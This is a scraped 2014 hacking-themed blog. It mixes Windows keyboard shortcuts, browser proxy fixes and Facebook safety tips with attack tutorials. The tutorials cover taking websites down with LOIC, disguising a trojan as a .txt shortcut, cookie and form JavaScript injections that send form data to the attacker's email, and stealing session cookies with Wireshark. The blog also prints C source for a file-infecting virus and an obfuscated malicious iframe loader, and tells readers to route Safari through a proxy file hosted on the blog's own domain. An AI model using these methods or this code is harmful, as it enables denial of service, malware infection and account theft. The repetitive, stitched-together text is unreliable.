31/10/2014

100 Amazing Keyboard Shortcuts and Their functions (Windows)


Getting familiar with keyboard shortcuts not only help you get the work done faster, but also more efficient.
Introduction: Keyboard shortcut is a sequence or combination of keystrokes on a computer keyboard which invokes commands in software. Some keyboard shortcuts require the user to press a single key or a sequence of keys one after the other. Other keyboard shortcuts require pressing and holding several keys simultaneously. Keyboard shortcuts may depend on the keyboard layout. Keyboard shortcuts are a common aspect of most modern operating systems and associated software applications. Their use is pervasive enough that some users consider them an essential element of their routine interactions with a computer. Whether used as a matter of personal preference or for adaptive technology
There are various types of Keyboard shortcuts, so I have grouped them up in different Categorizes below:
The General Shortcuts
Dialog Box Keyboard Shortcuts
MMC Console Window Keyboard Shortcuts
Remote Desktop Connection Navigation
Accessibility Keyboard Shortcuts
Microsoft Natural Keyboard Shortcuts
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
Windows Explorer Keyboard Shortcuts
Shortcut Keys for Character Map
Internet Explorer navigation
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Windows Explorer Keyboard Shortcuts
END = Display the bottom of the active window
HOME = Display the top of the active window
NUM LOCK + * = Display all of the subfolders that are under the selected folder
NUM LOCK + + = Display the contents of the selected folder
NUM LOCK + - = Collapse the selected folder
LEFT ARROW = Collapse the current selection if it is expanded, or select the parent folder
RIGHT ARROW = Display the current selection if it is collapsed, or select the first subfolder
Love this article?
Share it with your friends on Facebook

Internet Explorer navigation



Internet Explorer navigation
CTRL + B = Open the Organize Favorites dialog box
CTRL + E = Open the Search bar
CTRL + F = Start the Find utility
CTRL + H = Open the History bar
CTRL + I = Open the Favorites bar
CTRL + L = Open the Open dialog box
CTRL + N = Start another instance of the browser with the same Web address
CTRL + O = Open the Open dialog box, the same as CTRL + L
CTRL + P = Open the Print dialog box
CTRL + R = Update the current Web page
CTRL + W = Close the current window
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Remote Desktop Connection Navigation
CTRL + Alt + END = Open the microsoft Windows NT Security dialog box
Alt + PAGE UP = Switch between programs from left to right
Alt + PAGE DOWN = Switch between programs from right to left
Alt + INSERT = Cycle through the programs in most recently used order
Alt + HOME = Display the Start menu
CTRL + Alt + BREAK = Switch the client computer between a window and a full screen
Alt + Delete = Display the Windows menu
CTRL + Alt + - = Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer
CTRL + Alt + + = Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PRINT SCREEN on a local computer.
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



MMC Console Window Keyboard Shortcuts
CTRL + P = Print the current page or active pane
Alt + - = Display the window menu for the active console window
Shift + F10 = Display the Action shortcut menu for the selected item
F1 key = Open the Help topic, if any, for the selected item
F5 key = Update the content of all console windows
CTRL + F10 = Maximize the active console window
CTRL + F5 = Restore the active console window
Alt + Enter = Display the Properties dialog box, if any, for the selected item
F2 key =Rename the selected item
CTRL + F4 = Close the active console window. When a console has only one console window, this shortcut closes the console.
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL + O =Open a saved console
CTRL + N = Open a new console
CTRL + S = Save the open console
CTRL + M = Add or remove a console item
CTRL + W = Close window/tab
F5 key =Update the content of all console windows
Alt + Spacebar = Display the MMC window menu
Alt + F4 = Close the console
Alt + A = Display the Action menu
Alt + V = Display the View menu
Alt + F = Display the File menu
Alt + O = Display the Favorites menu.
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Shortcut Keys for Character Map
→After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW = Move to the right or to the beginning of the next line
LEFT ARROW = Move to the left or to the end of the previous line
UP ARROW = Move up one row
DOWN ARROW = Move down one row
PAGE UP = Move up one screen at a time
PAGE DOWN = Move down one screen at a time
HOME = Move to the beginning of the line
END = Move to the end of the line
CTRL + HOME = Move to the first character
CTRL + END = Move to the last character
Spacebar = Switch between Enlarged and Nor mal mode when a character is selected
Love this article?
Share it with your friends on  Facebook

Computer keyboard shortcut keys



Windows Explorer Keyboard Shortcuts
END = Display the bottom of the active window
HOME = Display the top of the active window
→NUM LOCK + * = Display all of the subfolders that are under the selected folder
NUM LOCK + + = Display the contents of the selected folder
NUM LOCK + - = Collapse the selected folder
LEFT ARROW =Collapse the current selection if it is expanded, or select the parent folder
RIGHT ARROW = Display the current selection if it is collapsed, or select the first subfolder
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Accessibility Keyboard Shortcuts
Right Shift for eight seconds =Switch Filter Keys either on or off
Left Alt + left Shift + PRINT SCREEN = Switch High Contrast either on or off
Left Alt + left Shift + NUM LOCK = Switch the Mouse Keys either on or off
Shift five times = Switch the Sticky Keys either on or off
NUM LOCK for five seconds = Switch the Toggle Keys either on or off
Win + U = Open Utility Manager
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Microsoft Natural Keyboard Shortcuts
Win = Display or hide the Start menu
Win + BREAK = Display the System Properties dialog box
Win + D = Display the desktop
Win + M = Minimize all of the windows
Win + Shift + M =Restore the minimized windows
Win + E =Open My Computer
Win + F =Search for a file or a folder
CTRL + Win + F = Search for computers
Win + F1 = Display Windows Help
Win + L = Lock the keyboard
Win + R = Open the Run dialog box
Win + U = Open Utility Manager
Love this article?
Share it with your friends on Facebook

Computer keyboard shortcut keys



Dialog Box Keyboard Shortcuts
CTRL + Tab = Move forward through the tabs
CTRL + Shift + Tab = Move backward through the tabs
Tab = Move forward through the options
Shift + Tab = Move backward through the options
Alt + Underlined letter = Perform the corresponding command or select the corresponding option
Enter = Perform the command for the active option or button
Spacebar = Select or clear the check box if the active option is a check box
Arrow keys =Select a button if the active option is a group of option buttons
F1 key = Display Help
F4 key = Display the items in the active list
Backspace = Open a folder one level up if a folder is selected in the Save As or Open dialog box
Love this article?
Share it with your friends on Facebook

30/10/2014

Computer keyboard shortcut keys



The General Shortcuts
We’ll kickoff the list with some really general shortcuts that you often used.
CTRL + C =Copy
CTRL + X = Cut
CTRL + V = Paste
CTRL + Z = Undo
Delete = Delete
Shift + Delete = Delete the selected item permanently without placing the item in the Recycle Bin
CTRL while dragging an item = Copy the selected item
CTRL + Shift while dragging an item = Create a shortcut to the selected item
F2 key = Rename the selected item
CTRL + RIGHT ARROW =Move the insertion point to the beginning of the next word
CTRL + LEFT ARROW = Move the insertion point to the beginning of the previous word
CTRL + DOWN ARROW = Move the insertion point to the beginning of the next paragraph
CTRL + UP ARROW = Move the insertion point to the beginning of the previous paragraph
CTRL + Shift with any of the arrow keys =Highlight a block of text
Shift with any of the arrow keys = Select more than one item in a window or on the desktop, or select text in a document
CTRL + A = Select all
F3 key = Search for a file or a folder
Alt + Enter = View the properties for the selected item
Alt + F4 = Close the active item, or quit the active program
Alt + Enter = Display the properties of the selected object
Alt + Spacebar = Open the shortcut menu for the active window
CTRL + F4 = Close the active document in programs that enable you to have multiple documents open simultaneously
Alt + Tab = Switch between the open items
Alt + ESC =Cycle through items in the order that they had been opened
F6 key = Cycle through the screen elements in a window or on the desktop
F4 key = Display the Address bar list in My Computer or Windows Explorer
Shift + F10 = Display the shortcut menu for the selected item
Alt + Spacebar = Display the System menu for the active window
CTRL + ESC = Display the Start menu
Alt + Underlined letter in a menu name = Display the corresponding menu
→Underlined letter in a command name on an open menu = Perform the corresponding command
F10 key = Activate the menu bar in the active program
RIGHT ARROW = Open the next menu to the right, or open a submenu
LEFT ARROW = Open the next menu to the left, or close a submenu
F5 key = Update the active window
Backspace = View the folder one level up in My Computer or Windows Explorer
ESC = Cancel the current task
Shift when you insert a CD-ROM into the CD-ROM drive = Prevent the CD-ROM from automatically playing
Love this article?
Share it with your friends on Facebook

How to Set Up Proxy Connection in Safari

1. Select Preferences from the menu of the browser toolbar.
2. Click on the Advanced tab, then click on the Change Settings button.

3. Click on the check box labeled Automatic Proxy Configuration.

4. Deselect the check box labeled "Use Passive FTP Mode PASV" if it is selected.
5. Enter the following URL into the field labeled Proxy Configuration File: http://www.deadlyuniversityspy.blogspot.com/proxy/pacserve
WARNING: Avoid common mistakes.
* When using Copy and Paste to enter the URL, be sure there is NO space in front of the http://
* Do not omit the http:// in the URL. It is necessary.
6. Click Apply Now.
7. Exit the Safari Preferences window.

How to Fix Proxy Server Connection Problem in Firefox


When surfing via Firefox, you may sometimes encounter such a problem proxy server refusing connections Firefox is configured to use a proxy server that is refusing connection. Check the proxy settings to make sure that they are correct. Then Firefox rejects to connect to the Internet. Even though you have not made any proxy settings for your Firefox you may also get this error information. Perhaps you have started to get this annoying message everytime you try to use Firefox. This is because Firefox has somehow changed its proxy settings automatically, for example, maybe it has imported proxy settings from other browsers such as Internet Explorer or some others. So it's easy to fix, what you need to do is just modify the proxy settings of Firefox manually

Proxy Setting
1. Click Tools > Options
2. Click Network
3. Click Connection > Settings
4. Select No proxy
5. Click OK
Note: Upcoming version of Firefox browser may affect your settings.

How to Fix Unable to Connect to Proxy Server in Chrome

You came across a connection error after installing a VPN or messing around with the Proxy Settings of your Google Chrome browser. Such an Error as:
Unable to Connect to Proxy Server
A proxy server is a server that acts as an intermediary between your computer and other servers. Right now, your system is configured to use a proxy, but Google Chrome can’t connect to it.


Here is how to fix it.
* Launch your Google Chrome Browser.
* Click on the Menu Bar, then Click on Settings.
* Scroll down to Show Advanced Settings click on it, then scroll down to Networks, then click on Change Proxy Settings.
* Now a new window would pop up, click on LAN Settings. A second window appears, now Tick the Automatically Detect Settings check box, click on OK to close Current window.

Proxy Setting:
If Google Chrome seems to take a long time to load a website or search, it may be configured to access pages through a web proxy. Check whether the Resolving proxy message appears in the lower-left corner of the browser window. Follow these steps to change your proxy setting (for Windows):
1. Click the Chrome menu on the browser toolbar.
2. Select Settings.
3. Click Show advanced settings.
4. In the Network section, click Change proxy settings This will open the Internet Properties dialog.
5. Click LAN settings.
6.Deselect the "Automatically detect settings" checkbox./
Note: Upcoming version of Chrome browser may affect your chrome settings.

28/10/2014

Shut down a Website With DDoS Attack



What is a Denial of Service Attack?
In computing, adenial-of-service (DoS) or distributed denial-of-service (DDoS) attackis an attempt to More Here

Types of denial of service attacks
There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes:
Bandwidth Attacks
Protocol Attacks
Logic Attacks

What is Distributed Denial of Service Attack?
In DDOS attack, The attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time. This makes it difficult to detect because attacks originate from several IP addresses. If a single IP address is attacking a company, it can block that address at its firewall. If it is 20000 this is extremely difficult.

Damages made By Denial of service attack
Over past years Denial of service attack has made huge amount of damage, Many of the have been victimed of this attack. This attack also hit Twitter and Facebook in past years, lot of people had trouble on logging on twitter and Facebook It was brought down by denial of service attack, They tired up there server so no one can get on log on it. Now i will show you how you can shut down a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called Low Orbit Ion Cannon this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running.
Remember that this tool will work best with high internet speeds, and try not to go for impossible targets like Google, Myspace,Yahoo. LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.
Pre-requisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
I am not giving a download link because then i will be accused for exiting hackers, try goggling
Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
Step 4: Click the big button
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

27/10/2014

How to Sent a Trojan Horse Virus as Txt File

Today I am Going to Explain you that How to Send Trojans as a Text Files that will execute your desired codes.. As you all know that .exe is a Executable File and can run a Code .In this Guide I will teach you How to make a .txt executable that can run all of your codes binded or crypted behind it.
What is RAT or Remote Access Trojan?

Purpose of Trojan horses?
Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system it is possible for a hacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of the Trojan horse.

Send Trojans as a Text Files
1. First of all You have to download the TEXT ICON PACK. You can download it from internet
2. Extract the Icon Pack to Obtain the Text Icons.
3. Open a new file, Right click - New - Shortcut Type the location of the item:
"X:/WINDOWS\system32\cmd.exe/cfile.txt" (where stands for "X"=Drive)

And name it Readme.txt
4. After creating the readme.txt file right click on it and choose Properties in the Start in fill %currentdir% in the Run choose Minimized

5. Then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then Properties-Change Icon.
6. In order to execute a file you need one just change your Server/Virus extension to .TXT and name it file.txt Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.
7. Now the readme.txt executes a command window, in order to hide it Right click on the readme.txt and choose properties > Layout and reduced the size on the window to height=1 and width=1. Now change the window position to height=999 and width=999.
8. Now you are ready to sent a trojan as a txt file.

Facebook Coloured Alphabet Codes


Facebook is one of the most grown and growing social networks in the world. For the same reason, hacks and tricks are becoming more popular. Have you ever sent coloured text in your chat/comments on facebook? Some people will answer in No So for those who are still unaware must check this out!
[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J
[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z
And the most important part How to use it?
Just copy the code of the alphabets you need and insert them in chat with a space between each codes. Now there you go with cool coloured text in chat!
Example: Here is thecode for HELLO
[[111356865552629]]
[[115430438474268]]
[[115807951764667]]
[[115807951764667]]
[[116564658357124]]

25/10/2014

Examples of Malicious JavaScript

If the hackers are using script to hack your site it will be obfuscated to try and hide what the script is doing. This type of hack can be inserted in individual html/php pages on a site or into one of the javascript files. The bottom line is, if you see blocks of obfuscated script in one of your files be suspicious, check to make sure you know exactly what the script is doing. In the vast majority of hacks the obfuscated script is going to write either an iframe or a script call into the pages of the site. The [src="http://some.malicious.site/malicious.php"] will be a URL that loads the malicious content into the page.
Now a few examples of code I have seen on hacked sites.
<sc​riptg&t;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{})) </sc​ript>
Which de-obfuscates to ->
function MakeFrameEx(){ element = do​cument.get​ ElementById('yahoo_api'); if (!element){ var el = do​cument.cr​ eateElement('if​rame'); do​cument.body.append​Child(el); el.id = 'yahoo_api'; el.style.width = '1px'; el.style.height = '1px'; el.style.display = 'none'; el.src = 'hxxp://​juyfdjhdjdgh​.nl ​.ai​/showthread.php?t=72241732' } } var ua = navigator.userAgent.toLowerCase(); if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1)) && ua.indexOf("windows") !=- 1){ var t = setTimeout("MakeFrameEx()", 1000) } <sc​ript>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F
Always follow up with some basic security checks. Figuring out how the rats are getting into the barn is always tough. Most hosting services will help by checking access logs, looking at file ownership etc. so ask your hosting service for any information they can provide.

24/10/2014

How to use your phone as a wireless keyboard and mouse for your PC

The humble mouse is one of the most ubiquitous peripherals associated with computers. When you use a laptop, you may opt to connect a mouse, but how would you like the idea of use a track-pad or touch-pad on a regular computer? It doesn’t matter if you're using a Moto Xor Nexus 5, or have a larger screened phone, you can use your Android phone as a mouse or trackpad to control your computer. Using Remote Mouse you can use just about any phone or tablet to control your computer. You can also use the app as a keyboard for text input.
The large screen of a phone such as the Nexus 6 is great for use as a trackpad, but smaller-screened phones work just as well. Getting up and running with Remote Mouse is a two-step process; you'll need to install the app on our phone, and install software in your computer as well.

Set up your PC
Start by visiting the Remote Mouse website on your computer to grab a copy of the necessary software. Click the Get Now link and then click the Windows button. Download the installer and then run through the set up process in the usual way.
There's no configuration needed, as long as you are connected to a wireless network. You'll be prompted to download a copy of the Remote Mouse app for your phone which you can do by scanning the QR code displayed in your web browser, or by simply download via Google Play.

Configure your phone
Grab a copy of Remote Mouse, make sure that you are connected to the same wireless network as your computer and then fire up the app. Swipe through the introduction and tap Start.

Remote Mouse will perform a network scan and should detect your computer running the desktop software. Establish a connection by clicking the name of your computer in the list that is displayed. You can then check out the simple instructions about how to use.
A regular click of the left mouse button takes nothing more than a tap of your phone's screen, while a right click can be achieved by tapping with two fingers at the same time. To mimic the actions of a mouse scroll wheel, place two fingers on the screen and move then up and down. To grab hold of a window or other on-screen object, you can double tap and drag. Click Got It, and you're ready to control your computer
You'll notice that there is a green area in the top portion of the screen, and this is where you use your phone as a trackpad, just move your finger around and the mouse cursor will follow suit. In the bottom half of the screen you can use your regular Android keyboard to send key presses to your computer, you can hide this by tapping the down arrow to the left of the screen if you are only interested in the trackpad option.
There are a few other little things that Remote Mouse can so. Tap the monitor icon in the row of buttons and you can access an app switcher for jumping between applications on your computer. Scroll over to the right and you'll find a button that allows you to shut down and restart your computer from your phone.
Share This Article on Facebook

22/10/2014

5 Things You Should Never Post on Facebook

For the sake of the safety of you and your family, there is some information that you should never post on Facebook.

1. You or Your Family's Full Birth Dates
We all love getting “happy birthdays” from our friends on our Facebook wall. It makes us feel all warm inside knowing that people remembered and cared enough to write us a short note on our special day. The problem is when you list your birthday you are providing identity thieves with one of the 3 or 4 pieces of personal information that is needed to steal your identity. It’s best to not list the date at all, but if you must, at least leave out the year. Your real friends should know this info anyway.

2. Your Relationship Status
Whether you are in a relationship or not, it may be best not to make it public knowledge. Stalkers would love to know that you just became newly single. If you change your status to single it gives them the green light they were looking for to resume stalking now that you're back on the market. It also lets them know that you might be home alone since your significant other is no longer around. Your best bet is to just leave this blank on your profile.

3. Your Current Location
There are a lot of people who love the location tagging feature on Facebook that allows them to let people know where they are 24/7. The problem is that you have just told everyone that you're on vacation and not at your house. If you add how long your trip is then thieves know exactly how much time they have to rob you. My advice is not to provide your location at all. You can always upload your vacation pictures when you get home or text your friends to let them know how jealous they should be that you're sipping an umbrella drink while they toil away at work.

4. The Fact That You Are Home Alone
It is extremely important that parents make sure their children never put the fact that they are home alone in their status. Again, you wouldn’t walk into a room of strangers and tell them you are going to be all alone at your house so don’t do it on Facebook either. We may think that only our friends have access to our status, but we really have no idea who is reading it. Your friend may have had their account hacked or someone could be reading over their shoulder at the library. The best rule of thumb is not to put anything in your profile or status that you wouldn’t want a stranger to know. You may have the most stringent privacy settings possible, but if your friend's account gets compromised than those settings go out the window.

5. Pictures of Your Kids Tagged With Their Names
We love our kids. We would do anything to keep them safe, but most people post hundreds of tagged pictures and videos of their kids to Facebook without even giving it a second thought. We even go so far as to replace our profile pictures with that of our children. Probably 9 out of 10 parents posted their child's full name, and exact date and time of birth while they were still in the hospital after delivery. We post pictures of our kids and tag them and their friends, siblings, and other relatives. This kind of information could be used by predators to lure your child. They could use your child’s name and the names of their relatives and friends to build trust and convince them that they are not really a stranger because they know detailed information that allows them to build a rapport with your child. If you must post pictures of your children then you should at least remove personally identifying information such as their full names and birth dates. Untag them in pictures. Your real friends know their names anyway.
Lastly, think twice before you tag pictures of the children of friends and relatives. They might not want you tagging their kids for the reasons mentioned above. You can send them a link to the pictures and they can tag themselves in place of their children if they want to.
Read Important Safety Tips
Share This Article on Facebook

21/10/2014

Javascript Injections

Disclaimer: This site is for learning purposes only! Anyone looking to commit a crime, must leave this page now! We do not encourage or approve illegal acts nor criminal activity of any sort. Using these skills outside of these sites could result in arrest and imprisonment!
Introduction: In this tutorial we are going to teach you all the basics you need to know, to start hacking with Javascript Injections. Hackers use Javascript Injections to find and change the values of elements in a website. We can use Javascript for 3 things: Alerts Cookies forms and values. And we have two types of injections we will use:
Alert and Void. We use the Javascript Alert Injection to find out what an element is. And we use the Javascript Void Injection to change that element. The Javascript Void Injection prevents your page from refreshing. This ensures your changes are valid on your current page. While this can be done on any browser, most do not support this straight out of the box. The best browser to use while doing this is Internet Explorer.


The Javascript Alert injection
It is used to show you the value of an element within the site via a pop up. A Javascript Alert is written like this javascript:alert(); So in order to show the cookies on the site; we could write javascript:alert(document.cookie); in address bar and press enter. This would show us a list of the cookies in use. Which we can use as valuable knowledge to make our attack via a injection.

Javascript Void Injection
It is used for changing the values of elements within the site. The void injection makes sure your web browser does not refresh. This ensures your changes validity on the current page your editing. We could use this to change the value of a cookie we found using our Alert Injection. For that we would write the following:
javascript:void(document.cookie=”hackedcookie=value”);
You would just replace hackedcookie with the cookie you want to change. And value to that which the cookie needs to be set to. For example you could use true This could make the cookie valid and grant you access to the site.

Javascript Form Injections:
You can use the methods learned above to edit forms as well. Through editing forms you can have valuable information like passwords emailed to you. But forms require the code to be written a little bit different. For example let’s say the form code was the following:
<form action=” http://www.test.com /submit.php” method=”post”> <input type=”hidden” name=”to” value=”info@ test.com”>
you would need to write:
javascript:void(document.forms[0].to.value=”myemail@ tester.com”);
in order to change the email of the form. When Javascript Injecting a form you need to let it know which form you want to change. Incase there are multiple forms on the page. The form is referenced by forms[x]‘, x being which form. The first form on the page is 0. Just like when counting arrays you start with 0 not 1. And you can change to.value to any part of the form you want
Share This Article on Facebook

18/10/2014

HTTP Session Hijacking Tutorial

First of all, before going any further you have to understand what a cookie is. So what is a cookie?
So in this tutorial you will be using a tool called Wire Shark and a firefox add on called Add N Edit Cookies. When done this process, just minimize Cain And Abel. Wire shark is a tool used to sniff packets from the network clients. we will be using this to steal our cookies. Add N Edit Cookies add on is to inject the stolen cookie into firefox browser. Download and install wireshark, open it up and click on Capture from menu bar. select your interface and click Start. this will start to capture all the packets from your network

Now find the packets using ther filterer http.cookie Look for packets which has POST and GET in it. this is the HTTP information sent to server.

Now once you found the cookie, copy its value like this:

Paste it and save it in a notepad file. Now the final thing to do is, open firefox and start the Add N Edit Cookies Add on from tools menu. Now Insert the stolen cookie here, and you're done! you should be having access to the victim's account now!

16/10/2014

How Do You Know If Your Computer Has Been Hijacked?


What is Computer Hijacking?
Computer hijackers take control and damage another computer system. A computer hijack occurs when an attacker takes control of a computer system and exploits it. There are a number of ways computer hijacks can occur, most involve a Network connection or physical access to the system and vulnerability in some part of the system. Once the hacker takes control of a system, he has the capability to use it however he wants. Many attackers use hijacked computers to steal private data, to monitor user activity, and/or to launch further hijack attacks against other systems.
Let's explore
Read Part I
Read Part II
Source: Computer Hope

Continue


Computer passwords have changed
Online passwords Sometimes, after an online account is hacked the attacker changes the password to one or more of accounts. Try using the forgot password feature to reset the password. If your e-mail address has changed or this feature does not work, contact the company who is providing the service. they are the only ones who can reset your account.
Local computer password: If your password to log into your computer has changed, it may have been hacked. There is no reason why a password would change on its own.

E-mail spam being sent
When an e-mail account is taken over, the attacker almost always uses that account to spread spam and viruses. If your friends, family, or coworkers are receiving advertising e-mail from you, your e-mail is compromised. Log into your e-mail and change your e-mail account password.
Tip: E-mail addresses can also be spoofed without hacking the account. After changing the e-mail password, if your friends continue to get e-mails you have not sent, it is likely someone is spoofing your e-mail address.

Increased network activity
For any attacker to take control of a computer, they must remotely connect to it. When someone is remotely connected to your computer, your Internet connection will be slower. Also, many times after the computer is hacked it becomes a zombie to attack other computers. Installing a band width monitor program on the computer can help determine what programs are using what band width on your computer. Windows users can also use the netstat command to determine remote established network connections and open ports.

Continue


Unknown programs requesting access
Computer security programs and firewalls help restrict access for security purposes. If the computer prompts for access to program you do not know, rogue programs may be installed, or it may have been hacked. If you do not know why a program needs access to the Internet, we recommend blocking access to that program. If you later discover these blocks cause problems, they can be removed.
Tip: A firewall prompting you for access may also just be someone trying to probe your Network looking for open or available ports.

Security programs uninstalled
If the computers antivirus, anti-malware program, or firewall that has been uninstalled or disabled, it can also be an indication of a hacked computer. A hacker may disable these programs to help hide any warnings that would appear while they are on your machine

Computer doing things by itself
When someone is remotely connected to a computer they can remotely control any device. For example, a mouse cursor could be moved or something could be typed. If you see the computer doing something as if someone else was in control, this can be an indication of a hacked computer or If the computer is dialing the Internet on its own, it is an indication that a program needs to connect to the Internet. It is common for programs like e-mail clients to do this to check for new e-mail. However, if you cannot identify what program needs Internet access, this can also be an indication of a hacked computer.

Internet browser home page changed
New toolbar Internet browser changes such as your home page changing to a different web page, a new toolbar getting added, your search provider changing, web pages getting redirected are all signs of a browser getting hijacked and not a computer hacker.

15/10/2014

How to Write a Computer Virus?

This program is an example of how tocreate a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory. Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#includes<io.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&
ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=
fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
This virus is designed to infect all types of files with any extension.

How the Virus Program Works?
The algorithm of this virus program is as follows:
Step 1. Search for files in the current directory. If one or more file is present, load the first file (target file).
Step 2. Load the copy of the virus itself onto the memory.
Step 3. Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step 4. Load the next file to infect and move to the Step 3. If all the files are infected, close all the open files, unload them from the memory and exit. As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
Share on Facebook

14/10/2014

5 Million Gmail Passwords Leaked In Latest Hack, Check If Yours Was Compromised

Despite the stringent measures being put in place by software makers far and wide, large-scale security breaches remain a black cloud over modern technology, and today, a Russian Bitcoin site has leaked a total of 5 million Gmail addresses and passwords. Initially, it was suspected that the leaks were of passwords specific to the Gmail account in question, although now, it seems that the credentials have been snatched from external websites of users who signed up using a Google email.
If you’re worried that your details may currently be out in the open, point your browser over to isleaked.com and enter your email. From there, you’ll quickly be able to discover if your account is in immediate danger. The site is a little hit-and-miss at present due to high traffic, but if you persevere with it and try reloading every couple of minutes, you’ll get lucky eventually.

DDoS Attack and It's Preventions


What is DDoS Attack?
In computing, adenial-of-service (DoS) or distributed denial-of-service (DDoS) attackis an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.
As clarification distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.

How to protect yourself during DDoS attack?
Step 1. Obtain a clean IP from your Network provider/ISP preferably one on different network segment. This new IP Address will be known as your origin server IP Configure the fresh/new IP onto your server.
Step 2. Let us know via email what your new origin IP is so we can setup the configuration on our side.
Step 3. If you require SSL on this server, email us the cert and private key in .PEM format. This should be in plain text and may be copied and pasted and included in the "step-2" email.
Step 4. If you have a firewall or other ACL's in your network please ensure that you allow those IP blocks access to your servers and I will need to forward you our IP Blocks so they will have access.
Step 5. We will send you IP Address. Make a DNS change to point your domain(s) to the IP Address we sent you. Ensure your TTL is set to 5 minutes or less.
Step 6. Remove the old IP Address from the server.
At this stage your traffic will start finding it's way to us where we will apply the required filters and send your server the legitimate traffic and will be in communication with you throughtout this process, to ensure everything is functioning as expected.
That's it. All things considered, the whole process should take about an hour.
Share on Facebook

13/10/2014

Google Maps tracking your Every Move, check for your FootPrints

Before reading any posts on University of Hackers, we would like to tell you that every post here is for your online security, safety or for awareness, and we do not teach hacking through our articles, if you find something which is being used to damage your online property or something like that, REPORT HERE
It is already being in question that Google is a controversial company after the NSA Spying threats, sometimes it was also said that Google has some secret relationship with NSA, but as the time passes, answers of these secret questions given by Google and through denying all the allegations.
